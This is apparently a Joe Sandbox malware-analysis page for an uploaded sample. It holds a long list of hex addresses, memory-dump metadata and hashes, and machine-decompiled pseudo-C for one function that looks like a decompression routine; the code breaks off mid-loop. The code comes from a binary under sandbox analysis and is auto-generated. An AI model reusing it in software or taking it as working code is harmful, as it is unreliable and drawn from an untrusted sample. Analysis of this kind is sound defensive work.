0x00000000
0x00b76bff
0x00b76bff
0x00b76c01
0x00000000
0x00000000
0x00b76c07
0x00b76c07
0x00b76c0d
0x00b76c11
0x00b76c17
0x00b76c18
0x00b76c1b
0x00b76c1d
0x00b769fc
0x00b769fc
0x00b769ff
0x00b76a01
0x00b768a1
0x00b768a1
0x00000000
0x00b768a1
0x00b76a07
0x00b76a09
0x00b76a0c
0x00b76a0f
0x00b76a12
0x00000000
0x00000000
0x00b76a18
0x00b76a1b
0x00b76a1e
0x00b76a21
0x00b76a24
0x00000000
0x00000000
0x00b76a2a
0x00b76a2d
0x00b76a30
0x00b76a33
0x00b76a36
0x00000000
0x00000000
0x00b76a3c
0x00b76a3f
0x00b76a42
0x00b76a45
0x00b76a48
0x00000000
0x00000000
0x00b76a4e
0x00b76a51
0x00b76a54
0x00b76a57
0x00b76a5a
0x00000000
0x00000000
0x00b76a60
0x00b76a63
0x00b76a66
0x00b76a69
0x00b76a6c
0x00000000
0x00000000
0x00b76a72
0x00b76a72
0x00b76a75
0x00000000
0x00b76a75
0x00b76c23
0x00b76c23
0x00b76c25
0x00b76c6b
0x00b76c6d
0x00b76c6d
0x00b76c70
0x00b76c74
0x00b76c76
0x00b76c76
0x00b76c79
0x00b76c7e
0x00b76c83
0x00b76c84
0x00b76c86
0x00b76c88
0x00b76c8a
0x00b76c8a
0x00b76c8a
0x00b769f8
0x00b769f8
0x00000000
0x00b769f8
0x00b76c27
0x00b76c29
0x00b76c29
0x00b76c2c
0x00b76c2c
0x00b76c2e
0x00b76c30
0x00b76c36
0x00b76c3c
0x00b76c42
0x00b76c48
0x00b76c4e
0x00b76c54
0x00b76c57
0x00b76c5a
0x00b76c5c
0x00b76c5f
0x00b76c61
0x00b76c61
0x00b76c61
0x00000000
0x00b76bd5
0x00b76bd5
0x00b76bd5
0x00b76bde
0x00b76bdf
0x00b7678e
0x00b7678e
0x00b76795
0x00b762ca
0x00b762ca
0x00b762ca
0x00b762ca
0x00b762cd
0x00b762cd
0x00000000
0x00b76c94
0x00b76c94
0x00b76c97
0x00b76c97
0x00b76c9f
0x00b76ca5
0x00b76ca5
0x00b76cab
0x00b76cad
0x00b76cb1
0x00b76cb7
0x00b76cbe
0x00b76cc0
0x00b76cc3
0x00b76cc3
0x00b76cc3
0x00b76cc8
0x00b76ccb
0x00b762ca
0x00b762ca
0x00b762ca
0x00b762ca
0x00b762ca
0x00b762cd
0x00b762d3
0x00b762de
0x00000000
0x00b762e0
0x00b762e0
0x00000000
0x00b762e0
0x00b762de
0x00b768fb
0x00b76902
0x00b76907
0x00b76907
0x00000000
0x00b768a9
0x00b768a9
0x00b768ac
0x00b768ac
0x00b768b4
0x00b768ba
0x00b768be
0x00b768be
0x00b768c4
0x00b768c6
0x00b768ca
0x00b768d0
0x00b768d7
0x00b768d9
0x00b768dc
0x00b768dc
0x00b768dc
0x00000000
0x00b768e1
0x00b762ca
0x00b76bd3
0x00b76b23
0x00b76b29
0x00b76b2c
0x00b76b2c
0x00b76b2c
0x00b76b2e
0x00000000
0x00000000
0x00b76b30
0x00b76b30
0x00b76b31
0x00b76b34
0x00b76b37
0x00000000
0x00000000
0x00b76b39
0x00000000
0x00b76b39
0x00b76b3b
0x00b76b3b
0x00000000
0x00b76b3b
0x00b76aed
0x00b76aef
0x00b76af2
0x00b76afc
0x00b76b04
0x00b76b07
0x00b76b0a
0x00b76b0d
0x00b76b15
0x00000000
0x00000000
0x00000000
0x00000000
0x00b76abf
0x00b76abf
0x00b76ac2
0x00b76ac4
0x00b76ac7
0x00b76ac7
0x00b76ac7
0x00000000
0x00b76abf
0x00b7692c
0x00b7692c
0x00b7692f
0x00b76931
0x00b762ca
0x00b762ca
0x00b762ca
0x00b762ca
0x00000000
0x00b762ca
0x00b762ca
0x00b76937
0x00b76937
0x00b7693e
0x00b76952
0x00b76952
0x00b7695d
0x00b76960
0x00b76965
0x00b76967
0x00b76969
0x00b76a7d
0x00b76a7d
0x00b76a83
0x00b76a83
0x00b76a89
0x00b76a8b
0x00b76a8f
0x00b76a95
0x00b76a9c
0x00b76a9e
0x00b76aa1
0x00b76aa1
0x00b76aa1
0x00000000
0x00b76aa6
0x00b7696f
0x00b7696f
0x00b76971
0x00000000
0x00000000
0x00b76977
0x00b76977
0x00b7697d
0x00b76981
0x00b76987
0x00b76988
0x00b7698b
0x00b7698d
0x00000000
0x00000000
0x00b7698f
0x00b7698f
0x00b76991
0x00b769d4
0x00b769d6
0x00b769d6
0x00b769d9
0x00b769dd
0x00b769df
0x00b769df
0x00b769e2
0x00b769e7
0x00b769ec
0x00b769ed
0x00b769ef
0x00b769f1
0x00b769f3
0x00b769f3
0x00b769f3
0x00000000
0x00b769df
0x00b76993
0x00b76995
0x00b76995
0x00b76998
0x00b76998
0x00b7699a
0x00b7699c
0x00b769a2
0x00b769a8
0x00b769ae
0x00b769b4
0x00b769ba
0x00b769c0
0x00b769c3
0x00b769c6
0x00b769c8
0x00b769cb
0x00b769cd
0x00b769cd
0x00b769cd
0x00000000
0x00b769d2
0x00b76940
0x00b76940
0x00b76949
0x00b7694a
0x00000000
0x00b7694a
0x00b768ea
0x00b768f0
0x00b768f2
0x00b768f7
0x00b768f9
0x00000000
0x00000000
0x00000000
0x00b768f9
0x00b764a9
0x00b764a9
0x00b764af
0x00b764b2
0x00b764c8
0x00b764cb
0x00b764d1
0x00b764d4
0x00b764d6
0x00b764da
0x00b764df
0x00b764e5
0x00b764f0
0x00b764f7
0x00b764f9
0x00b764f9
0x00b764fc
0x00b76500
0x00b76503
0x00b76503
0x00b764b4
0x00b764b4
0x00b764b8
0x00b764b8
0x00b76508
0x00b7650f
0x00b76515
0x00b7651b
0x00b76522
0x00b76561
0x00b76563
0x00b76564
0x00b76565
0x00b76567
0x00b76583
0x00b76586
0x00b7658a
0x00b7658d
0x00b76593
0x00b7659d
0x00b765a0
0x00b765a6
0x00b765a9
0x00b765b6
0x00b765b8
0x00b765be
0x00b765c0
0x00b765c0
0x00b765c2
0x00000000
0x00b765c2
0x00b76569
0x00b7656f
0x00b76572
0x00b76572
0x00b76572
0x00b76574
0x00000000
0x00000000
0x00b76576
0x00b76576
0x00b76577
0x00b7657a
0x00b7657d
0x00000000
0x00000000
0x00b7657f
0x00000000
0x00b7657f
0x00b76581
0x00b76581
0x00000000
0x00b76524
0x00b76524
0x00b76526
0x00b76529
0x00b7652b
0x00b76537
0x00b7653e
0x00b76542
0x00b76545
0x00b76549
0x00b76550
0x00b76553
0x00b76557
0x00b765ca
0x00b765ca
0x00b765cd
0x00b765d0
0x00b765da
0x00b765e4
0x00b765e9
0x00b765ea
0x00b765ee
0x00b765f0
0x00b765f4
0x00b765f6
0x00b76744
0x00b76744
0x00b76747
0x00b76747
0x00b7674d
0x00b7674f
0x00b76750
0x00b76756
0x00b76758
0x00b76759
0x00b7675f
0x00b76761
0x00b76761
0x00b76761
0x00b7675f
0x00b76756
0x00b76765
0x00b7676b
0x00b76771
0x00b76774
0x00b76777
0x00b7677e
0x00b76781
0x00b7679f
0x00b7679f
0x00b767aa
0x00b767ac
0x00b767b1
0x00b767b5
0x00b767b7
0x00000000
0x00000000
0x00b767bd
0x00b767bd
0x00b767bf
0x00000000
0x00000000
0x00b767c5
0x00b767c5
0x00b767cd
0x00b767d0
0x00b767d6
0x00b767d7
0x00b767da
0x00b767dc
0x00b767de
0x00b76856
0x00b76856
0x00b76858
0x00b7685c
0x00b7685f
0x00b76862
0x00b76867
0x00b7686a
0x00b7686d
0x00b76872
0x00b76875
0x00b76878
0x00b7687d
0x00b76880
0x00b76883
0x00b76888
0x00b7688b
0x00b7688e
0x00b76893
0x00b76896
0x00b76899
0x00b7689e
0x00b7689e
0x00b76899
0x00b7688e
0x00b76883
0x00b76878
0x00b7686d
0x00b76862
0x00000000
0x00b76858
0x00b767e0
0x00b767e0
0x00b767e4
0x00b7682a
0x00b7682c
0x00b7682c
0x00b7682f
0x00b76833
0x00b76835
0x00b76835
0x00b76838
0x00b7683d
0x00b76842
0x00b76843
0x00b76845
0x00b76847
0x00b76849
0x00b76849
0x00b76849
0x00b7684e
0x00b76852
0x00000000
0x00b76852
0x00b767e6
0x00b767e8
0x00b767e8
0x00b767eb
0x00b767eb
0x00b767ed
0x00b767ef
0x00b767f5
0x00b767fb
0x00b76801
0x00b76807
0x00b7680d
0x00b76813
0x00b76816
0x00b76819
0x00b7681b
0x00b7681e
0x00b76820
0x00b76820
0x00b76820
0x00b76825
0x00000000
0x00b76783
0x00b76783
0x00b76783
0x00b7678c
0x00b7678d
0x00000000
0x00b7678d
0x00b76781
0x00b765fc
0x00b765fc
0x00b765ff
0x00b7670e
0x00b76711
0x00b7671a
0x00b76723
0x00b76727
0x00b7672b
0x00b76732
0x00b7673c
0x00b7673f
0x00000000
0x00b7673f
0x00b76605
0x00b76605
0x00b76649
0x00b76607
0x00b7660a
0x00b76617
0x00b76626
0x00b7662a
0x00b7662e
0x00b76634
0x00b76636
0x00b76639
0x00b7663d
0x00b76640
0x00b76644
0x00b76644
0x00b7664e
0x00b76655
0x00b7665b
0x00b76661
0x00b76668
0x00b76699
0x00b7669b
0x00b7669c
0x00b7669d
0x00b766a1
0x00b766a3
0x00b766c1
0x00b766c4
0x00b766d0
0x00b766d3
0x00b766d7
0x00b766dc
0x00b766ef
0x00b766f1
0x00b766f7
0x00b766f9
0x00b766f9
0x00b766fb
0x00000000
0x00b766fb
0x00b766a5
0x00b766ab
0x00b766ae
0x00b766ae
0x00b766ae
0x00b766b0
0x00000000
0x00000000
0x00b766b2
0x00b766b2
0x00b766b3
0x00b766b6
0x00b766b9
0x00000000
0x00000000
0x00b766bb
0x00000000
0x00b766bb
0x00b766bd
0x00b766bd
0x00000000
0x00b7666a
0x00b7666a
0x00b7666c
0x00b7666f
0x00b76679
0x00b76689
0x00b7668c
0x00b7668f
0x00b76703
0x00b76706
0x00b76706
0x00b76708
0x00b76708
0x00000000
0x00b76708
0x00b76668
0x00b765d2
0x00b765d2
0x00000000
0x00b765d2
0x00b76522
0x00b7645f
0x00b7645f
0x00b76466
0x00b76490
0x00b76493
0x00b76496
0x00000000
0x00b76468
0x00b76475
0x00b76480
0x00000000
0x00b76480
0x00b76466
0x00b763ba
0x00b7635f
0x00b7635f
0x00b76362
0x00000000
0x00000000
0x00b76364
0x00b76366
0x00b7636b
0x00b76371
0x00b76377
0x00000000
0x00000000
0x00b7637d
0x00b7637d
0x00b76391
0x00b76391
0x00b76398
0x00b76cd0
0x00b76cd0
0x00000000
0x00b76cd0
0x00000000
0x00b76398
0x00b7637f
0x00b7637f
0x00b76385
0x00b7638b
0x00000000
0x00000000
0x00000000
0x00b7638b
0x00b762cd

Memory Dump Source

Source File: 00000000.00000002.268617007.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true

Associated: 00000000.00000002.268588954.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.269911240.0000000000B93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BA5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270239864.0000000000BC2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.270395727.0000000000BC3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b60000_1JCAVkYU3U.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
Instruction ID: 4ffd12db1fb145cd15193b5024e31f830b447cee5cd3d3bb05d6481f3f824471
Opcode Fuzzy Hash: b6eb7e628c131b77d64230efdf3487e18faf11e64f64428999ea75b77c32f4a9
Instruction Fuzzy Hash: 7E629471604B859FCB25CF28C4906B9BBE1AF95304F08C9AED9AE8B346D734E945CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00B777EF Relevance: .8, Instructions: 817
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00B777EF(signed int __ecx) {
				signed int _t363;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t373;
				signed int _t374;
				signed int _t375;
				signed int _t376;
				signed int _t377;
				signed int _t378;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				void* _t385;
				signed int _t388;
				signed int _t389;
				intOrPtr _t391;
				signed int _t401;
				char _t410;
				unsigned int _t411;
				void* _t421;
				signed int _t422;
				signed int _t423;
				intOrPtr _t425;
				signed int _t428;
				char _t437;
				signed int _t439;
				signed int _t441;
				signed int _t444;
				signed int* _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t457;
				void* _t462;
				signed int _t463;
				signed int _t464;
				intOrPtr _t466;
				signed int _t469;
				char _t478;
				unsigned int _t479;
				signed int* _t483;
				signed int _t484;
				signed int _t485;
				signed int _t486;
				signed int _t491;
				signed int _t492;
				signed short _t493;
				unsigned int _t499;
				signed int _t500;
				signed int* _t506;
				unsigned int _t507;
				intOrPtr _t520;
				intOrPtr* _t521;
				intOrPtr _t523;
				signed int* _t524;
				signed int _t525;
				intOrPtr _t526;
				signed int _t528;
				void* _t529;
				signed int _t532;
				signed int* _t534;
				unsigned int _t537;
				signed int _t538;
				void* _t539;
				signed int _t542;
				signed int _t544;
				signed int _t547;
				void* _t549;
				unsigned int _t552;
				signed int _t553;
				intOrPtr* _t555;
				void* _t556;
				signed int _t559;
				signed int _t560;
				signed int _t561;
				signed int _t564;
				signed int* _t569;
				void* _t570;
				signed int _t573;
				signed int _t575;
				signed int _t577;
				signed int _t580;
				void* _t582;
				unsigned int _t585;
				signed int _t586;
				signed int _t588;
				signed int _t590;
				void* _t592;
				signed int _t595;
				intOrPtr* _t597;
				void* _t598;
				signed int _t601;
				void* _t604;
				signed int _t607;
				signed int _t608;
				intOrPtr* _t610;
				void* _t611;
				signed int _t614;
				signed int _t615;
				void* _t617;
				signed int _t620;
				intOrPtr* _t623;
				void* _t624;
				signed int _t628;
				unsigned int _t630;
				signed int _t633;
				signed int _t634;
				signed int _t635;
				unsigned int _t637;
				signed int _t640;
				void* _t643;
				signed int* _t644;
				signed int _t645;
				signed int _t646;
				void* _t649;
				unsigned int _t651;
				signed int _t654;
				signed int _t658;
				void* _t661;
				signed int* _t662;
				unsigned int _t664;
				signed int _t667;
				signed int _t669;
				signed int _t670;
				signed int _t671;
				intOrPtr* _t672;
				signed int _t673;
				signed int* _t674;
				signed int _t676;
				signed int _t677;
				unsigned int _t681;
				signed int _t682;
				signed int _t686;
				signed int _t687;
				signed int _t688;
				signed int _t689;
				signed int* _t690;
				signed int* _t691;
				signed int* _t692;
				signed int _t694;
				unsigned int _t696;
				signed int _t697;
				signed int _t698;
				signed int* _t699;
				signed int _t702;
				signed int _t704;
				signed int _t705;
				signed int _t707;
				signed int _t709;
				char* _t710;
				signed int _t711;
				unsigned int _t713;
				signed int _t714;
				signed int _t715;
				signed int _t716;
				signed int _t723;
				signed int _t724;
				void* _t725;

				_t520 =  *((intOrPtr*)(_t725 + 0x40));
				_t686 = __ecx;
				_t692 = _t520 + 4;
				 *(_t725 + 0x24) = __ecx;
				_t672 = _t520 + 0x18;
				 *(_t725 + 0x10) = _t692;
				if( *((char*)(_t520 + 0x2c)) != 0) {
					 *(_t725 + 0x10) = _t692;
					L4:
					_t523 =  *_t672;
					if( *_t692 <=  *((intOrPtr*)(_t520 + 0x24)) + _t523) {
						_t363 =  *((intOrPtr*)(_t520 + 0x20)) - 1 + _t523;
						_t694 =  *((intOrPtr*)(_t520 + 0x4acc)) - 0x10;
						 *(_t725 + 0x18) = _t363;
						 *(_t725 + 0x14) = _t694;
						 *(_t725 + 0x2c) = _t363;
						__eflags = _t363 - _t694;
						if(_t363 >= _t694) {
							 *(_t725 + 0x2c) = _t694;
						}
						_t524 =  *(_t725 + 0x10);
						while(1) {
							_t673 =  *(_t686 + 0xe6dc);
							_t628 =  *(_t686 + 0x7c) & _t673;
							 *(_t686 + 0x7c) = _t628;
							_t525 =  *_t524;
							__eflags = _t525 -  *(_t725 + 0x2c);
							if(_t525 <  *(_t725 + 0x2c)) {
								goto L19;
							}
							L13:
							__eflags = _t525 - _t363;
							if(__eflags > 0) {
								L145:
								return 1;
							}
							if(__eflags != 0) {
								L16:
								__eflags = _t525 - _t705;
								if(_t525 < _t705) {
									L18:
									__eflags = _t525 -  *((intOrPtr*)(_t520 + 0x4acc));
									if(_t525 >=  *((intOrPtr*)(_t520 + 0x4acc))) {
										L144:
										 *((char*)(_t520 + 0x4ad3)) = 1;
										goto L145;
									}
									goto L19;
								}
								__eflags =  *((char*)(_t520 + 0x4ad2));
								if( *((char*)(_t520 + 0x4ad2)) == 0) {
									goto L144;
								}
								goto L18;
							}
							__eflags =  *((intOrPtr*)(_t520 + 8)) -  *((intOrPtr*)(_t520 + 0x1c));
							if( *((intOrPtr*)(_t520 + 8)) >=  *((intOrPtr*)(_t520 + 0x1c))) {
								goto L145;
							}
							goto L16;
							L19:
							_t526 =  *((intOrPtr*)(_t686 + 0x4b3c));
							__eflags = (_t526 - _t628 & _t673) - 0x1004;
							if((_t526 - _t628 & _t673) >= 0x1004) {
								L24:
								_t674 =  *(_t725 + 0x10);
								_t367 = E00B6A89D(_t674);
								_t368 =  *(_t520 + 0xb4);
								_t630 = _t367 & 0x0000fffe;
								__eflags = _t630 -  *((intOrPtr*)(_t520 + 0x34 + _t368 * 4));
								if(_t630 >=  *((intOrPtr*)(_t520 + 0x34 + _t368 * 4))) {
									_t528 = 0xf;
									_t369 = _t368 + 1;
									 *(_t725 + 0x28) = _t528;
									__eflags = _t369 - _t528;
									if(_t369 >= _t528) {
										L32:
										_t696 = _t674[1] + _t528;
										_t697 = _t696 & 0x00000007;
										 *_t674 =  *_t674 + (_t696 >> 3);
										 *(_t725 + 0x1c) =  *_t674;
										_t373 =  *(_t725 + 0x28);
										_t674[1] = _t697;
										_t529 = 0x10;
										_t532 =  *((intOrPtr*)(_t520 + 0x74 + _t373 * 4)) + (_t630 -  *((intOrPtr*)(_t520 + 0x30 + _t373 * 4)) >> _t529 - _t373);
										__eflags = _t532 -  *((intOrPtr*)(_t520 + 0x30));
										asm("sbb eax, eax");
										_t374 = _t373 & _t532;
										__eflags = _t374;
										_t524 =  *(_t725 + 0x10);
										_t633 =  *(_t520 + 0xcb8 + _t374 * 2) & 0x0000ffff;
										_t375 =  *(_t725 + 0x1c);
										L33:
										_t634 = _t633 & 0x0000ffff;
										__eflags = _t634 - 0x100;
										if(_t634 >= 0x100) {
											__eflags = _t634 - 0x106;
											if(_t634 < 0x106) {
												__eflags = _t634 - 0x100;
												if(_t634 != 0x100) {
													__eflags = _t634 - 0x101;
													if(_t634 != 0x101) {
														_t635 = _t634 + 0xfffffefe;
														__eflags = _t635;
														_t534 = _t686 + (_t635 + 0x18) * 4;
														_t698 =  *_t534;
														 *(_t725 + 0x28) = _t698;
														if(_t635 == 0) {
															L117:
															 *(_t686 + 0x60) = _t698;
															_t699 =  *(_t725 + 0x10);
															_t376 = E00B6A89D(_t699);
															_t377 =  *(_t520 + 0x2d78);
															_t637 = _t376 & 0x0000fffe;
															__eflags = _t637 -  *((intOrPtr*)(_t520 + 0x2cf8 + _t377 * 4));
															if(_t637 >=  *((intOrPtr*)(_t520 + 0x2cf8 + _t377 * 4))) {
																_t676 = 0xf;
																_t378 = _t377 + 1;
																__eflags = _t378 - _t676;
																if(_t378 >= _t676) {
																	L125:
																	_t537 = _t699[1] + _t676;
																	_t538 = _t537 & 0x00000007;
																	_t699[1] = _t538;
																	 *_t699 =  *_t699 + (_t537 >> 3);
																	_t381 =  *_t699;
																	 *(_t725 + 0x34) = _t538;
																	_t539 = 0x10;
																	 *(_t725 + 0x30) = _t381;
																	_t542 =  *((intOrPtr*)(_t520 + 0x2d38 + _t676 * 4)) + (_t637 -  *((intOrPtr*)(_t520 + 0x2cf4 + _t676 * 4)) >> _t539 - _t676);
																	__eflags = _t542 -  *((intOrPtr*)(_t520 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t382 = _t381 & _t542;
																	__eflags = _t382;
																	_t383 =  *(_t520 + 0x397c + _t382 * 2) & 0x0000ffff;
																	L126:
																	_t677 = _t383 & 0x0000ffff;
																	__eflags = _t677 - 8;
																	if(_t677 >= 8) {
																		_t702 = (_t677 >> 2) - 1;
																		_t681 = ((_t677 & 0x00000003 | 0x00000004) << _t702) + 2;
																		__eflags = _t702;
																		if(_t702 != 0) {
																			_t411 = E00B6A89D( *(_t725 + 0x10));
																			_t644 =  *(_t725 + 0x10);
																			_t549 = 0x10;
																			_t681 = _t681 + (_t411 >> _t549 - _t702);
																			_t552 =  *(_t725 + 0x34) + _t702;
																			_t553 = _t552 & 0x00000007;
																			__eflags = _t553;
																			 *_t644 = (_t552 >> 3) +  *(_t725 + 0x30);
																			_t644[1] = _t553;
																		}
																	} else {
																		_t681 = _t677 + 2;
																	}
																	_t640 =  *(_t686 + 0x7c);
																	_t544 =  *(_t725 + 0x28);
																	_t385 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
																	_t704 = _t640 - _t544;
																	 *(_t686 + 0x74) = _t681;
																	__eflags = _t704 - _t385;
																	if(_t704 >= _t385) {
																		L140:
																		_t524 =  *(_t725 + 0x10);
																		_t363 =  *(_t725 + 0x18);
																		__eflags = _t681;
																		if(_t681 == 0) {
																			goto L11;
																		}
																		_t388 =  *(_t686 + 0xe6dc);
																		do {
																			_t389 = _t388 & _t704;
																			_t704 = _t704 + 1;
																			 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t640)) =  *((intOrPtr*)(_t389 +  *((intOrPtr*)(_t686 + 0x4b40))));
																			_t388 =  *(_t686 + 0xe6dc);
																			_t640 =  *(_t686 + 0x7c) + 0x00000001 & _t388;
																			 *(_t686 + 0x7c) = _t640;
																			_t681 = _t681 - 1;
																			__eflags = _t681;
																		} while (_t681 != 0);
																		goto L35;
																	} else {
																		__eflags = _t640 - _t385;
																		if(_t640 >= _t385) {
																			goto L140;
																		}
																		_t391 =  *((intOrPtr*)(_t686 + 0x4b40));
																		_t521 = _t391 + _t704;
																		_t710 = _t391 + _t640;
																		_t643 = 8;
																		 *(_t686 + 0x7c) = _t640 + _t681;
																		__eflags = _t681 - _t643;
																		if(_t681 < _t643) {
																			L84:
																			_t363 =  *(_t725 + 0x18);
																			_t524 =  *(_t725 + 0x10);
																			__eflags = _t681;
																			if(_t681 == 0) {
																				L10:
																				_t520 =  *((intOrPtr*)(_t725 + 0x4c));
																				L11:
																				_t705 =  *(_t725 + 0x14);
																				continue;
																				do {
																					do {
																						_t673 =  *(_t686 + 0xe6dc);
																						_t628 =  *(_t686 + 0x7c) & _t673;
																						 *(_t686 + 0x7c) = _t628;
																						_t525 =  *_t524;
																						__eflags = _t525 -  *(_t725 + 0x2c);
																						if(_t525 <  *(_t725 + 0x2c)) {
																							goto L19;
																						}
																						goto L13;
																					} while (_t681 == 0);
																					_t646 =  *(_t686 + 0x7c);
																					_t561 =  *(_t686 + 0x60);
																					_t421 =  *((intOrPtr*)(_t686 + 0xe6d8)) + 0xffffeffc;
																					_t709 = _t646 - _t561;
																					__eflags = _t709 - _t421;
																					if(_t709 >= _t421) {
																						L112:
																						_t422 =  *(_t686 + 0xe6dc);
																						do {
																							_t423 = _t422 & _t709;
																							_t709 = _t709 + 1;
																							 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t646)) =  *((intOrPtr*)(_t423 +  *((intOrPtr*)(_t686 + 0x4b40))));
																							_t422 =  *(_t686 + 0xe6dc);
																							_t646 =  *(_t686 + 0x7c) + 0x00000001 & _t422;
																							 *(_t686 + 0x7c) = _t646;
																							_t681 = _t681 - 1;
																							__eflags = _t681;
																						} while (_t681 != 0);
																						L35:
																						_t524 =  *(_t725 + 0x10);
																						_t363 =  *(_t725 + 0x18);
																						goto L11;
																					}
																					__eflags = _t646 - _t421;
																					if(_t646 >= _t421) {
																						goto L112;
																					}
																					_t425 =  *((intOrPtr*)(_t686 + 0x4b40));
																					_t521 = _t425 + _t709;
																					_t710 = _t425 + _t646;
																					_t649 = 8;
																					 *(_t686 + 0x7c) = _t646 + _t681;
																					__eflags = _t681 - _t649;
																					if(_t681 < _t649) {
																						goto L84;
																					}
																					__eflags = _t561 - _t681;
																					if(_t561 >= _t681) {
																						_t428 = _t681 >> 3;
																						__eflags = _t428;
																						 *(_t725 + 0x34) = _t428;
																						_t688 = _t428;
																						do {
																							E00B80320(_t710, _t521, _t649);
																							_t725 = _t725 + 0xc;
																							_t649 = 8;
																							_t521 = _t521 + _t649;
																							_t710 = _t710 + _t649;
																							_t681 = _t681 - _t649;
																							_t688 = _t688 - 1;
																							__eflags = _t688;
																						} while (_t688 != 0);
																						L83:
																						_t686 =  *(_t725 + 0x24);
																						goto L84;
																					}
																					_t564 = _t681 >> 3;
																					__eflags = _t564;
																					do {
																						_t681 = _t681 - _t649;
																						 *_t710 =  *_t521;
																						 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																						 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																						 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																						 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																						 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																						 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																						_t437 =  *((intOrPtr*)(_t521 + 7));
																						_t521 = _t521 + _t649;
																						 *((char*)(_t710 + 7)) = _t437;
																						_t710 = _t710 + _t649;
																						_t564 = _t564 - 1;
																						__eflags = _t564;
																					} while (_t564 != 0);
																					goto L84;
																					L92:
																					_t524 =  *(_t725 + 0x10);
																					_t705 =  *(_t725 + 0x14);
																					_t363 =  *(_t725 + 0x18);
																					__eflags = _t681;
																				} while (_t681 == 0);
																				_t463 =  *(_t686 + 0xe6dc);
																				_t716 =  *(_t725 + 0x34);
																				do {
																					_t464 = _t463 & _t716;
																					_t716 = _t716 + 1;
																					 *((char*)( *((intOrPtr*)(_t686 + 0x4b40)) + _t658)) =  *((intOrPtr*)(_t464 +  *((intOrPtr*)(_t686 + 0x4b40))));
																					_t463 =  *(_t686 + 0xe6dc);
																					_t658 =  *(_t686 + 0x7c) + 0x00000001 & _t463;
																					 *(_t686 + 0x7c) = _t658;
																					_t681 = _t681 - 1;
																					__eflags = _t681;
																				} while (_t681 != 0);
																				goto L35;
																			}
																			 *_t710 =  *_t521;
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 1;
																			if(_t681 <= 1) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 2;
																			if(_t681 <= 2) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 3;
																			if(_t681 <= 3) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 4;
																			if(_t681 <= 4) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 5;
																			if(_t681 <= 5) {
																				goto L10;
																			}
																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																			_t363 =  *(_t725 + 0x18);
																			__eflags = _t681 - 6;
																			if(_t681 <= 6) {
																				goto L10;
																			}
																			_t520 =  *((intOrPtr*)(_t725 + 0x4c));
																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																			goto L35;
																		}
																		__eflags = _t544 - _t681;
																		if(_t544 >= _t681) {
																			_t401 = _t681 >> 3;
																			__eflags = _t401;
																			 *(_t725 + 0x34) = _t401;
																			_t687 = _t401;
																			do {
																				E00B80320(_t710, _t521, _t643);
																				_t725 = _t725 + 0xc;
																				_t643 = 8;
																				_t521 = _t521 + _t643;
																				_t710 = _t710 + _t643;
																				_t681 = _t681 - _t643;
																				_t687 = _t687 - 1;
																				__eflags = _t687;
																			} while (_t687 != 0);
																			goto L83;
																		}
																		_t547 = _t681 >> 3;
																		__eflags = _t547;
																		do {
																			_t681 = _t681 - _t643;
																			 *_t710 =  *_t521;
																			 *((char*)(_t710 + 1)) =  *((intOrPtr*)(_t521 + 1));
																			 *((char*)(_t710 + 2)) =  *((intOrPtr*)(_t521 + 2));
																			 *((char*)(_t710 + 3)) =  *((intOrPtr*)(_t521 + 3));
																			 *((char*)(_t710 + 4)) =  *((intOrPtr*)(_t521 + 4));
																			 *((char*)(_t710 + 5)) =  *((intOrPtr*)(_t521 + 5));
																			 *((char*)(_t710 + 6)) =  *((intOrPtr*)(_t521 + 6));
																			_t410 =  *((intOrPtr*)(_t521 + 7));
																			_t521 = _t521 + _t643;
																			 *((char*)(_t710 + 7)) = _t410;
																			_t710 = _t710 + _t643;
																			_t547 = _t547 - 1;
																			__eflags = _t547;
																		} while (_t547 != 0);
																		goto L84;
																	}
																}
																_t555 = _t520 + (_t378 + 0xb3e) * 4;
																while(1) {
																	__eflags = _t637 -  *_t555;
																	if(_t637 <  *_t555) {
																		break;
																	}
																	_t378 = _t378 + 1;
																	_t555 = _t555 + 4;
																	__eflags = _t378 - 0xf;
